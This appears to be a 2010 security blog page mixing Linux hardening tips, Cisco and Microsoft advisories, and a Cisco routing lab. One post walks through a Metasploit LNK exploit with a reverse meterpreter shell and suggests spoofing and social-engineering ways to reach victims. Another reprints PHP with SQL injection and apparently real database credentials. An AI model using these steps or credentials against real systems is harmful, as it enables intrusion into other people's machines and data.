Aug 24 2010

Linux Basix Eps017 Tech Segment

I appeared on the Linux Basix podcast a few weeks ago but since I was out of the country for a while I am now getting around to posting the show notes for my segment.

Information Security news in the world of Linux:

A security issue affects the following Ubuntu releases:
— Ubuntu 9.04
— Ubuntu 9.10
— Ubuntu 10.04 LTS

  • Brief Details :

It was discovered that the PC/SC service did not correctly handle  malformed messages. A local attacker could exploit this to execute
arbitrary code with root privileges. In short update your system NOW!

Dell Latitude 2110 vulnerability –> https://lists.ubuntu.com/archives/ubuntu-security-announce/2010-August/001135.html

A security issue affects the following Ubuntu releases:

  • Ubuntu 9.10
    Ubuntu 10.04 LTS
  • Brief Details:

It was discovered that the Ubuntu image shipped on some Dell Latitude 2110 systems was accidentally configured to allow unauthenticated package installations. A remote attacker intercepting network communications or a malicious archive mirror server could exploit this to trick the user into installing unsigned packages, resulting in arbitrary code execution with root privileges.
Segment Title: SSH tunneling for good or evil!

What is SSH –

Secure Shell or SSH is a network protocol that allows data to be exchanged using a secure channel between two networked devices.

How to install/Setup SSH?

First be sure to install the most recent version as of yesterday OpenSSH version 5.6 is the most recent version.

sudo apt-get install ssh or configure from source

  • Then do a quick test by trying to SSH into your own machine, SSH  localhost
  • Then of course you can always edit the  /etc/ssh/sshd_config file and do things like force version 2, deny root login and sort.

What is tunneling?

Tunneling, also known as “port forwarding,” is the transmission of data intended for use only within a private, usually corporate network through a public network in such a way that the routing nodes in the public network are unaware that the transmission is part of a private network

Various types of tunneling protocols:

  • HTTP
  • ICMP
  • DNS
  • SSH

    SSH tunneling how it works: Nice Youtube video to get you started –> http://www.youtube.com/watch?v=EUplDL4hSuc

    When can you use this?

    • For good –> You can use this to create a Sock5 proxy to securely tunnel your web traffic for instance if you are at a free Wi-Fi hot spot.
    • Or if you want to bypass some content filtering that’s in place to block you from accessing certain websites
    • Securely tunnel your IM chat or Email which you know by default are both clear text protocol

    Examples:

    Tunneling Gtalk traffic –>  ssh -f  [email protected] -L 3000:talk.google.com:5222 home -N

    Tunneling Email –>  ssh -f [email protected] -L 2000:personal-server.com:25 -N

    • For evil –> http://infolookup.securegossip.com/2010/05/13/keeping-an-eye-on-your-vendors/, “reverse SSH tunneling “as you would expect if tunneling is getting pass a firewall  in a forward direction, reverse tunneling is getting access to the inside host by going out and coming back in. I linked to a posting I did back in May about an incident I had to track down and re-mediate.
      • In short  A vendor  of ours had a Linux based  appliance on the inside of our network in which the had a pre-configured  “stealthy reverse tunnel” that would give them access to that system at anytime without our assistance.

    Reference Links

    <https://secure.wikimedia.org/wikipedia/en/wiki/Secure_Shell>

    https://calomel.org/firefox_ssh_proxy.html

    https://help.ubuntu.com/community/SSH/OpenSSH/Configuring
    http://www.howtogeek.com/howto/ubuntu/setup-openssh-server-on-ubuntu-linux/

    http://searchenterprisewan.techtarget.com/sDefinition/0,,sid200_gci213230,00.html

    Aug 04 2010

    Multipple Vulnerabilities in Cisco ASA 5500 Series “Public Release 2010 August 04″

    I received notification of the following vulnerabilities outlined below via the full disclosure mail list but you can find a direct link to it here –> Link. I figured it was worth mentioning again since most organization depend on their Firewall as the primary means of protection against the many threats on the  internet.

    The Cisco ASA 5500 Series Adaptive Security Appliance is a modular platform that provides security and VPN services. It offers firewall, intrusion prevention system (IPS), anti-X, and VPN services.

    Cisco ASA 5500 Series Adaptive Security Appliances are affected by the following vulnerabilities:

    SunRPC Inspection Denial of Service Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The Sun RPC inspection engine enables or disables application inspection for the Sun RPC protocol. Sun RPC is used by Network File System (NFS) and Network Information Service (NIS). Sun RPC services can run on any port. When a client attempts to access a Sun RPC service on a server, it must learn the port that service is running on. The client does this by querying the port mapper process, usually rpcbind, on the well-known port of 111. Three DoS vulnerabilities affect the SunRPC inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances, in which an unauthenticated attacker may cause the affected device to reload.

    Note:  Only transit traffic can trigger these vulnerabilities; traffic that is destined to the appliance will not trigger the vulnerabilities. These vulnerabilities can be triggered by using UDP packets, not TCP.

    These vulnerabilities are documented in Cisco bug IDs CSCtc77567, CSCtc79922, and CSCtc85753; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1578, CVE-2010-1579, and CVE-2010-1580, respectively.

    Transport Layer Security (TLS) Denial of Service Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    TLS and its predecessor, SSL, are cryptographic protocols that provide security for communications over IP data networks such as the Internet.

    Three vulnerabilities exist on the Cisco ASA security appliances that can be triggered by a series of crafted TLS packets. An unauthenticated attacker may cause the affected device to reload. A Cisco ASA device configured for SSL VPN, TLS Proxy for Encrypted Voice Inspection, or configured to accept ASDM management connections is vulnerable.

    These vulnerabilities are documented in Cisco bug IDs CSCtd32627, CSCtf37506, and CSCtf55259; and have been assigned Common Vulnerabilities and Exposures (CVE) IDs CVE-2010-1581, CVE-2010-2814, and CVE-2010-2815, respectively.

    Session Initiation Protocol (SIP) Inspection Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    SIP, as defined by the Internet Engineering Task Force (IETF), enables call handling sessions, particularly two-party audio conferences, or “calls.” SIP works with SDP for call signalling. SDP specifies the ports for the media stream. Using SIP, the Cisco ASA can support any SIP VoIP gateways and VoIP proxy servers. To support SIP calls through the Cisco ASA, signaling messages for the media connection addresses, media ports, and embryonic connections for the media must be inspected, because while the signaling is sent over a well-known destination port (UDP/TCP 5060), the media streams are dynamically allocated. Also, SIP embeds IP addresses in the user-data portion of the IP packet. SIP inspection applies NAT for these embedded IP addresses.

    A DoS vulnerability affects the SIP inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances. SIP inspection is enabled by default. During successful exploitation, an unauthenticated attacker may cause the affected device to reload.

    Note:  Only transit traffic can trigger these vulnerabilities; traffic that is destined to the appliance will not trigger the vulnerabilities.

    This vulnerability is documented in Cisco bug ID CSCtd32106 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2816.

    Crafted Internet Key Exchange (IKE) Message Denial of Service Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    IPsec is an IP security feature that provides robust authentication and encryption of IP packets. IKE is a key management protocol standard that is used in conjunction with the IPsec standard. A DoS vulnerability exists in the IKE implementation of the Cisco ASA.

    During successful exploitation, an unauthenticated attacker may cause an affected device to reload.

    Note:  Only traffic that is destined to the appliance may trigger this vulnerability when the affected device is configured for IPsec remote access or site-to-site VPNs.

    This vulnerability is documented in Cisco bug ID CSCte46507 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2010-2817.

    As a side note I would like to add that unless you are already running on version 8.3 you should disable the vulnerable services and take a moment to read the release note for version 8.3.

    The are some syntax changes you have to adjust too, as well as do a full rule set conversion. Below is an example of an old rule and its recommended migrated counterpart. Some of the migrated rules and not all new since the were supported in older IOS version, however its now mandatory to do them the proper/recommended way instead of the older way.

    Old Configuration

    static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 80

    access-list 1 extended permit tcp any host 172.23.57.170 eq 5080

    access-list 1 extended permit udp any host 172.23.57.170 eq 5080

    access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

    access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

    access-group 1 in interface outside

    Migrated Configuration

    static (inside,outside) tcp 172.23.57.170 5080 10.50.50.50 access-list 1 extended permit tcp any host 10.50.50.50 eq 80

    access-list 1 extended permit udp any host 172.23.57.170 eq 5080

    access-list 1 extended permit tcp any host 172.23.57.170 eq 10000

    access-list 1 extended permit tcp any host 10.2.3.4 eq 5080

    access-group 1 in interface outside

    Jul 29 2010

    Linux Basix Security Tips Part 1

    A while back I hinted to the wonderful guys over at  http://www.linuxbasix.com/ that I would like to appear on the show and do a segment on Linux security, the agreed and below are some of the notes that can be used to follow alone with my segment.

    Disclaimer: I am by no means a Linux security expert; I am just trying to bring some visibility to a topic that I believe all new users should think about.

    Taken from the Linux basix website, our goal here is to bring together information that will make your introduction to Linux and Open Source Software more enjoyable and productive. As we go along we will be constantly updating this site with our shows and show notes. If you have any questions please post comments to the shows and blog. Feel free to let us know what you think of the show and we will do our best to make it make as much sense as possible. Once the forum is up and running it will be a source to find answers, tips and tricks to make computing more enjoyable.

    The goal of my segment is not to touch on anything too advance, for that you can find several Linux hardening guide by CERT, NSA, and many more resources out there. Instead I will be focusing on giving a few tips that anyone new to Linux should keep in mind before connecting their server/workstation to the internet.

    I would like to start by sharing a few sentences I found in a blog posting over at computer world;

    “You see Windows was designed as a single-user, non-networked operating system. That design is still at the heart of Windows, which is why security must always be an add-on to Windows. Linux, in contrast, was built from the ground up as a multi-user, networked system. Linux, like Unix, which came before it, was constructed to work in a world with hostile users.”

    Physical Security ( might seem silly but this should always be considered)

    Configure the BIOS to disable booting from CDs/DVDs, external devices, and set a password to protect these settings, you can also go another step by encrypting your entire drive. Next, set a password for the GRUB bootloader.

    • Generate a password hash using the command  /usr/sbin/grub-md5-crypt.
    • Add the hash to the first line of /boot/grub/menu.lst as follows: password –md5 passwordhash

    Minimum install as possible

    Take a moment to think about your installation, I understand you might not know exactly what you want but don’t install everything at first. Just do the basics and as you learn more you can then install those additional application and do it properly. Also remove unnecessary packages, only keep the ones you need, and lastly remove any accounts that are not needed.

    # yum list installed
    # yum list packageName
    # yum remove packageName

    OR

    # dpkg –list
    # dpkg –info packageName
    # apt-get remove packageName

    Stay away form clear text protocols

    Under no circumstances do you want to use any clear text protocol. Any of the following  protocols or programs   (telnet, rsh, rlogin, FTP, TFTP) can give out your username/password to anyone on your local network with a packet sniffer. If you are hosting a website or providing users with a login portal ensure that you are not using http, but instead https even if you have to generate your own certificate.

    Identify all open ports and services

    Its important to know what ports you have open and what services are associated to them this way you can decide if you would like to block or filter them with a firewall. This is also important so in the event you notice a new port open you already have a baseline to compare it too.

    To do you can use a tool like  Nmap (“Network Mapper”) which is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

    ex nmap -A -sV 127.0.0.1

    You can also use the following for identifying and turning off unwanted services:

    To view all services that are turned on:
    # chkconfig --list | grep '3:on'

    To disable a service:

    # service serviceName stop
    # chkconfig serviceName off

    Security software

    • Install Antivirus software, I am aware that Linux is not highly prone to viruses like your average Windows PC, but don’t for a moment think that Linux is not being successfully exploited in the wild every day. You want to ensure that you are not the “Low Hanging Fruit” in short don’t be the easy target.
    • Install/configure firewall (SELinux, IP Tables, and AppArmor) and take a moment to read how to configure it.

    Keep Your Software Up to Date

    • Configure your system to update via your software repository and apply then automatically. Security updates should be applied as soon as possible.
    • Create the file apt.cron, make it executable, place it in /etc/cron.daily or /etc/cron.weekly, and ensure that it reads as follows:

    #!/bin/sh
    /usr/bin/apt-get update
    #
    Or aptitude –s safe-upgrade

    Password policy

    • You want to insure that you have a proper password policy, first identify any user accounts that has an empty password and set on or remove the account.
    • Setup password aging, its important to keep rotating your password a minimum every 60 days.
    • Set up some sort of password lockout policy, if someone attempts a brute force attempt you need to at least slow them down, a standard practice is to lockout an account after 3 failed login attempts.To get password expiration information, enter:
      chage -l userName

      To see failed login attempts, enter:
      faillog

      To unlock an account after login failures, run:
      faillog -r -u userName

      Note you can use passwd command to lock and unlock accounts:
      # lock account
      passwd -l userName

      # unlock account
      passwd -u userName

      Identify empty passwords type the following command
      # awk -F: ‘($2 == “”) {print}’ /etc/shadow

    Make Sure No Non-Root Accounts Have UID Set To 0

    Only root account have UID 0 with full permissions to access the system. Type the following command to display all accounts with UID set to 0:

    # awk -F: '($3 == "0") {print}' /etc/passwd

    You should only see one line as follows:
    root:x:0:0:root:/root:/bin/bash

    If you see other lines, delete them or make sure other accounts are authorized by you to use UID 0.

    File and file system security

    SUID and SGID files on your system are a potential security risk, and should be monitored closely. Because these programs grant special privileges to the user who is executing them, it is necessary to ensure that insecure programs are not installed. A favorite trick of crackers is to exploit SUID-root programs, then leave a SUID program as a back door to get in the next time, even if the original hole is plugged.

    • Find all SUID/SGID programs on your system, and keep track of what they are, so you are aware of any changes which could indicate a potential intruder. Use the following command to find all SUID/SGID programs on your system:

    root# find  / -type  f \ ( -perm -04000 -o -perm -02000 \)

    World-writable files, particularly system files, can be a security hole if a cracker gains access to your system and modifies them. Additionally, world-writable directories are dangerous, since they allow a cracker to add or delete files as he wishes. (can upload malware to a site and infect visitors)

    To locate all world-writable files on your system, use the following command:

    find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print

    Secure ssh remote access

    • Disable root login via ssh, if someone is going to try and brute force your ssh server the first user name the will try will be root, so ensure that you do not allow ssh login for your root user. You can verify or edit this but changing the config file in:

    vi /etc/ssh/sshd_config

    Find this section in the file, containing the line with “PermitRootLogin” in it.

    #LoginGraceTime 2m
    #PermitRootLogin no
    #StrictModes yes
    #MaxAuthTries 6

    Then restart your SSH service with sudo /etc/init.d/sshd restart

    Noowner Files

    Files not owned by any user or group can pose a security problem. Just find them with the following command which do not belong to a valid user and a valid group.

    find /dir -xdev \( -nouser -o -nogroup \) -print

    Keeping an eye on your logs:

    You should configure logging and auditing so you can keep an eye on any type of  attacks that are launched against your system. You can manually check the following logs or use a tool like logwatch or logcheck or any number of log parsers out there. Logs of interest are :

    • /var/log/syslog
    • /var/log/faillog
    • /var/log/auth
    • /var/log/lastlog
    • /var/log/messages
    • /var/log/apahe2/access.log and error.log

    When all else fail, here are some useful Scripts and tools you can use:

    Lynis: Lynis is an auditing tool for Unix (specialists). It scans the system and available software, to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes.

    Security audit tool,is a security tool that can be used both as a security audit as well as a part of an intrusion detection system. It consists of set of tests, library and textual/graphical front-end. Tests are sorted into groups and security levels. Administrators can run selected tests, groups or whole security levels.

    The Bastille Hardening program “locks down” an operating system, proactively configuring the system for increased security and decreasing its susceptibility to compromise. Bastille can also assess a system’s current state of hardening, granularity reporting on each of the security settings with which it works.

    audit2.pl (perl): This second script searches the entire file system, listing SUID, SGID, world-writable, group-writable files. It also lists trust files and their contents. Finally it lists files with weird names (e.g., containing punctuation characters), which might be danger or a sign of penetration. On a large server with 100GB disks, this can take a few hours to run.

    Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2).  It tries to find misconfiguration that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).

    DenyHosts is a script intended to be run by Linux system administrators to help thwart SSH server attacks (also known as dictionary based attacks and brute force attacks).

    OpenVAS stands for Open Vulnerability Assessment System and is a network security scanner with associated tools like a graphical user front-end. The core component is a server with a set of network vulnerability tests (NVTs) to detect security problems in remote systems and applications.

    References:

    http://iase.disa.mil/stigs/checklist/index.html

    http://www.sans.org/score/checklists/linuxchecklist.pdf

    http://www.nsa.gov/ia/_files/os/redhat/rhel5-guide-i731.pdf

    http://georgia.ubuntuforums.org/showthread.php?t=1002167&page=2

    http://boilinglinux.blogspot.com/2008/07/ubuntu-hardy-hardening.html

    http://www.cyberciti.biz/tips/linux-security.html

    http://www.debian.org/doc/manuals/securing-debian-howto/

    http://tldp.org/HOWTO/Security-HOWTO/file-security.html

    http://blogs.computerworld.com/16367/dell_back_tracks_on_linux_being_safer_than_windows

    http://www.rootkit.nl/projects/lynis.html

    https://fedorahosted.org/sectool/

    http://www.security-database.com/toolswatch/

    http://securitytube.net/Mastering-IPTables-video.aspx

    http://nmap.org/

    http://www.openvas.org/

    http://www.bastille-unix.org/

    http://denyhosts.sourceforge.net/

    http://pentestmonkey.net/tools/unix-privesc-check/

    http://www.boran.ch/audit

    http://oreilly.com/pub/h/66

    http://www.howtogeek.com/howto/linux/security-tip-disable-root-ssh-login-on-linux/

    http://www.cyberciti.biz/faq/linux-log-files-location-and-how-do-i-view-logs-files/

    Jul 22 2010

    Exploiting MS “LNK” Vulnerability

    A few days ago I posted a blog entry called Microsoft Validates Shortcut Vulnerability, this entry basically explains what the issue is and also listed a few basic mitigation techniques.

    Below I will be demonstrating how you can actively exploit this vulnerability using Metasploit.

    Proof of concept testing:
    This test was preformed using my BT4 VM which was assigned IP address 192.168.126.135 and a Win XPSP3 VM using IP address 192.168.126.134.

    Step 1: Load Metasploit and get latest update

    On my BackTrack4 VM, I browsed to /pentest/exploit/framework3, then load msfconsole once that is loaded run svn update so you can get the latest and greatest.

    Fig-1 SVN Update

    Step 2: Select your Exploit and Payload

    msf > use exploit/windows/browser/ms10_xxx_Windows_shell_lnk_execute

    msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp

    msf exploit(ms10_xxx_Windows_shell_lnk_execute) > show options

    The show options commands will show you the various parameters  that needs to be set in order for the exploit to be functional. In our case its setting up the listening IP and listening port.

    Fig-2  Choosing Exploit and Payload

    Step 3: Fill-in required options and run exploit

    At this stage you simply fill in the correct IP address and listening port for the machine that you are launching the attack from. If this is not correct the victim machine would not know where to connect back too, since I selected reverse_tcp.

    msf exploit(ms10_xxx_Windows_shell_lnk_execute) > SET SRVHOST 192.168.126.135

    msf exploit(ms10_xxx_Windows_shell_lnk_execute) >SET LHOST 192.168.126.135

    msf exploit(ms10_xxx_Windows_shell_lnk_execute) >exploit

    Fig-3 Fill-in LHOST and SRVHOST

    Step 4: Get your victim to click the link or view the malicious file

    Now at this stage  you have to get a bit creative, I can suggest a few things you can try:

    • Use Ettercap to DNS spoof a target network and redirect them to your malicious URL, example.
    • Use a tool like Social Engineering Toolkit “SET” to send a spoofed email with your malicious link, example.
    • ARP spoof your host network and find a given target that’s using Facebook or one of  many social networks and try to send them the link that way.
    • Try a far out social engineering  attack like purchase several USB drives inject them and mail them to your target with the label “free USB drive”.

    Once you have your targets in sight just sit back and wait, once an exploitation has been kicked off you will see the below;

    Fig-4 Successful Exploit

    Verify you have an active session, session using sessions -l, next connect to that session with sessions -i #, from here you can run help to get a list of possible commands. I simply ran ipconfig and getuid to show that I was on the Windows XPVM and that it was successfully exploited.

    Fig-5 Running Commands on exploited host

    Fig-6 Popup box on exploited host

    In the end there is really not much the average user can do that is not aware of your everyday vulnerability, but us as IT professional need to be in the loop so that we can take back the information and make them aware. Lastly the image in figure 6 should be a dead giveaway that something is up with your computer if you didn’t connect to a share but all of sudden you see one pop-up its time for a “wipe and reinstall.” Have fun until Microsoft patches this one and remember to be responsible. All feedback are welcome.



    Jul 22 2010

    Being smart about testing your application

    This is just going to be a short writeup on something I figure was worth mentioning. While going through pastebin I found the following entry  3 seconds after it was posted–> http://pastebin.com :

    <?php

    include ‘top.php';

    include ‘submenuhonorshall.php';

    /*SELECT * FROM TABLE WHERE field =

    */

    $db = ‘gnemi_addison';

    mysql_connect(“gnemi.php-corner.com”, “gnemi_root”, “ignurupi87″) or die(mysql_error());

    mysql_select_db($db) or die(mysql_error());

    ?>

    <div id=”content”>

    <h1>Honors Hall Library</h1>

    <form method=”post”>

    <p class=”norm”>

    <select name=”searchby”>

    <option value=”Author_First_Name”>Author First Name</option>

    <option value=”Author_Last_Name” selected=”selected”>Author Last Name</option>

    <option value=”Title”>Title</option>

    </select>

    <input type=”text” name=”query” />

    <input type=”submit” value=”Submit!” />

    </p>

    </form>

    <?php

    $result = mysql_query(“SELECT * FROM `library` WHERE `'” . $_POST[‘searchby’] . “‘` = ‘” . $_POST[‘query’] . “‘ ORDER BY `Title` LIMIT 20″);

    while ($row = mysql_fetch_array($result))

    {

    echo $row[‘Last Name’] . $row[‘First Name’] . $row[‘Title’] .$row[‘inout’];

    }

    ?>

    <?php

    include ‘../address.php';

    include ‘../phptemplates/bottomhall.php';

    ?>

    Now to the average person that’s not a big deal, but to me after looking at that bit of php code the following questions came to mind:

    • Would I find anything useful if I were to Google the various pages referenced in that code or maybe the domain “gnemi.php-corner.com”?
    • What if I ran a whois lookup against that domain what would I find?
    • What if I Google the email addresses associated with that domain?
    • And most importantly are the username and password referenced stilling being used currently?
    • Are those tables and DB name real or just test names?
    • Would I find anything interesting if I were to crawl that website?

    Now a simple whois returned a valid email address along with some other useful information:

    And just out of curiosity after visiting http://gnemi.php-corner.com/godWindow/ I was presented with the following:

    Now I ***DID NOT LOGIN*** I repeat  ***DID NOT LOGIN*** so I don’t know if those credential are valid BUT what if the were? I am hoping for this person’s sake all of the above information is just for testing purposes but what if its no? Sanitizing all valid  information before posting it would have been nice.

    Jul 19 2010

    Microsoft Validates Shortcut Vulnerability

    Last Thursday I read a posting over at   http://krebsonsecurity.com referencing  a potential vulnerability that relates to the way how Windows parses shortcuts. Since Microsoft didn’t confirm this at the time it was just another  interesting read. Now one day later Microsoft did validate this claim and now its yet another Windows zero-day without a proper workaround.

    Issue:

    The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the user clicks the displayed icon of a specially crafted shortcut. This vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited.

    Workaround:

    Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

    Disable the displaying of icons for shortcuts

    Note Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the “Changing Keys And Values” Help topic in Registry Editor (Regedit.exe) or view the “Add and Delete Information in the Registry” and “Edit Registry Data” Help topics in Regedt32.exe.

    1. Click Start, click Run, type Regedit in the Open box, and then click OK
    2. Locate and then click the following registry key:

    HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler

    3. Click the File menu and select Export
    4. In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and click Save

    Note This will create a backup of this registry key in the My Documents folder by default

    5. Select the value (Default) on the right hand window in the Registy Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter.
    6. Restart explorer.exe or restart the computer.

    Impact of workaround.Disabling icons from being displayed for shortcuts prevents the issue from being exploited on affected systems. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

    Disable the WebClient service

    Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround, it will still be possible for remote attackers who successfully exploited this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user’s computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.

    To disable the WebClient Service, follow these steps:

    1. Click Start, click Run, type Services.msc and then click OK.
    2. Right-click WebClient service and select Properties.
    3. Change the Startup type to Disabled. If the service is running, click Stop.
    4. Click OK and exit the management application.

    Impact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.

    How to undo the workaround.

    To re-enable the WebClient Service, follow these steps:

    1. Click Start, click Run, type Services.msc and then click OK.
    2. Right-click WebClient service and select Properties.
    3. Change the Startup type to Automatic. If the service is not running, click Start.
    4. Click OK, and exit the management application.

    This brings up the same concern I spoke about in this post , now that Microsoft is no longer supporting SP2 we can add this to the list of exploits that we can always be certain will work on the SP2 platform. In the end, if the workaround is not hindering any mission critical application  I think everyone should apply it.

    References:

    http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw/

    http://www.computerworld.com/s/article/9179299/Microsoft_confirms_nasty_Windows_zero_day_bug?taxonomyId=17

    http://www.microsoft.com/technet/security/advisory/2286198.mspx

    http://clubhouse.microsoft.com/Public/Post/48631f1c-c884-4d3e-a19b-c9994bcd4637

    Click OK and exit the management application.

    Jul 13 2010

    Cisco Administrative Distance Manipulation – Part 1

    Ok – “infolookup” has been asking for my contribution to his blog for quite some time now.  This is my first and hopefully not the last.

    Recently I needed to meet a redundancy requirement on a Cisco router running both EIGRP and OSPF. The requirement was simple: favor the prefix learned via EIGRP and use the prefix learned via OSPF as a backup. I must also mention that the prefix is an EIGRP (D EX) route, which has an AD of 170 and an OSPF (O E2) route which has an AD of 110. In the first part of this article, I will go through the setup of the lab, which closely simulates the scenario I had and in the second part, will go through the actual remedy implemented that resulted in a “happy network”.

    Let’s get to it.

    First, let’s go through the topology. This lab contains 5 routers: R0 – R5 as follows:

    R0 = Representing a 3rd party network , who is advertising 198.200.230.0/24; 222.102.23.0/24; 0.0.0.0/0; 172.203.46.0/24

    R1 = R0’s BGP peer / NAT point of our network / redistribution point of BGP to EIGRP

    R2 = The Main router running EIGRP, RIP & OSPF (Think of this as the CORE of a particular site)

    R3 = Router running RIP and OSPF. This provides a backup route towards one of the destinations available from R0 (222.102.23.0/24)

    R4 = Router running OSPF. This provides a backup route towards one of the destinations available from R0  (198.200.230.0/24)

    Please see Topology Diagram:

    Administrative Distance Lab Topology

    R0’s relevant configuration:

    hostname R0
    !
    interface Loopback0
    ip address 198.200.230.1 255.255.255.0
    !
    interface Loopback1
    ip address 222.102.23.1 255.255.255.0
    !
    interface Loopback2
    ip address 172.203.46.1 255.255.255.0
    !
    interface FastEthernet0/0
    description FastE to R1
    ip address 10.146.12.2 255.255.255.254
    duplex auto
    speed auto
    !
    router bgp 65000
    no synchronization
    bgp log-neighbor-changes
    network 0.0.0.0
    network 172.203.46.0 mask 255.255.255.0
    network 198.200.230.0
    network 222.102.23.0
    neighbor R1-eBGP peer-group
    neighbor R1-eBGP remote-as 65001
    neighbor R1-eBGP route-map ROUTER-1-IN in
    neighbor R1-eBGP route-map ROUTER-1-OUT out
    neighbor 10.146.12.3 peer-group R1-eBGP
    no auto-summary
    !
    ip route 0.0.0.0 0.0.0.0 Null0
    !
    ip prefix-list R1-IN seq 5 permit 172.32.27.0/24
    !
    ip prefix-list R1-OUT seq 5 permit 198.200.230.0/24
    ip prefix-list R1-OUT seq 10 permit 222.102.23.0/24
    ip prefix-list R1-OUT seq 15 permit 172.203.46.0/24
    ip prefix-list R1-OUT seq 20 permit 0.0.0.0/0
    !
    route-map ROUTER-1-IN permit 10
    match ip address prefix-list R1-IN
    !
    route-map ROUTER-1-OUT permit 10
    match ip address prefix-list R1-OUT
    !
    Nothing fancy here, just basic BGP peering and prefix advertisement filters (in/outbound).

    R1’s relevant configuration:
    hostname R1
    !
    ip address 172.32.27.1 255.255.255.0
    !
    interface Loopback1
    ip address 172.25.240.1 255.255.255.0
    !
    interface FastEthernet0/0
    description FastE to R0

    ip address 10.146.12.4 255.255.255.254
    ip nat inside
    ip virtual-reassembly

    duplex auto
    speed auto
    !
    interface FastEthernet1/0
    description FastE to R2

    ip address 10.146.12.3 255.255.255.254
    ip nat outside
    ip virtual-reassembly

    duplex auto
    speed auto
    !
    router eigrp 200
    redistribute bgp 65001 metric 1 1 1 1 1
    network 10.146.12.4 0.0.0.0
    network 172.25.240.1 0.0.0.0
    no auto-summary
    !
    router bgp 65001
    no synchronization
    bgp log-neighbor-changes
    network 172.32.27.0 mask 255.255.255.0
    neighbor R0-eBGP peer-group
    neighbor R0-eBGP remote-as 65000
    neighbor R0-eBGP route-map ROUTER-0-OUT out
    neighbor 10.146.12.2 peer-group R0-eBGP
    no auto-summary
    !
    ip nat pool OVERLOAD 172.32.27.100 172.32.27.100 netmask 255.255.255.0
    ip nat inside source list 10 pool OVERLOAD overload
    !
    ip prefix-list R0-OUT seq 5 permit 172.32.27.0/24
    !
    access-list 10 deny 10.146.12.3
    access-list 10 permit any
    !
    route-map ROUTER-0-OUT permit 10
    match ip address prefix-list R0-OUT
    !

    Not too fancy either. Doing BGP to EIGRP redistribution and performing NAT on traffic sourcing from ACL 10. Since R1 is only advertising 172.32.27.0/24 to R0, without the NATing on R1, I wouldn’t be able to ping R0’s loopbacks from R4 for example.

    R2’s relevant configuration:

    hostname R2
    ! interface FastEthernet0/0
    ip address 10.146.12.5 255.255.255.254
    duplex auto
    speed auto
    !
    interface FastEthernet1/0
    ip address 172.19.200.1 255.255.255.0
    duplex auto
    speed auto
    !
    router eigrp 200
    redistribute ospf 100 metric 1 1 1 1 1
    network 10.146.12.5 0.0.0.0
    no auto-summary
    !
    router ospf 100
    router-id 172.19.200.1
    log-adjacency-changes
    network 172.19.200.1 0.0.0.0 area 0
    network 172.25.196.1 0.0.0.0 area 0
    default-information originate always
    !
    router rip
    version 2
    network 172.19.0.0
    no auto-summary
    !

    Probably the simplest of all the configs, but this is the key router on which we’ll be going through the Administrative Distance (AD) exercise.   Not a lot to explain here either.  Redistributing OSPF into EIGRP, so that R1 knows of the subnets from R3/4 as well as the shared segment between R2/R3 and R4.

    R3’s relavant configuration:


    hostname R3
    !
    !
    interface Loopback1
    ip address 11.12.13.1 255.255.252.0
    !
    interface Loopback2
    ip address 14.15.16.1 255.255.252.0
    !
    interface Loopback3
    ip address 201.200.200.2 255.255.255.0
    !
    interface Loopback4
    ip address 199.199.199.1 255.255.255.0
    !
    interface FastEthernet0/0
    ip address 172.19.200.2 255.255.255.0
    duplex auto
    speed auto
    !
    router ospf 100
    router-id 172.19.200.2
    log-adjacency-changes
    network 11.12.13.1 0.0.0.0 area 0
    network 14.15.16.1 0.0.0.0 area 0
    network 172.19.200.2 0.0.0.0 area 0
    distribute-list prefix DEFAULT-ONLY in
    !
    router rip
    version 2
    redistribute static
    network 172.19.0.0
    no auto-summary
    !
    ip route 222.102.23.0 255.255.255.0 Null0
    !
    !
    ip prefix-list DEFAULT-ONLY seq 5 permit 0.0.0.0/0
    !

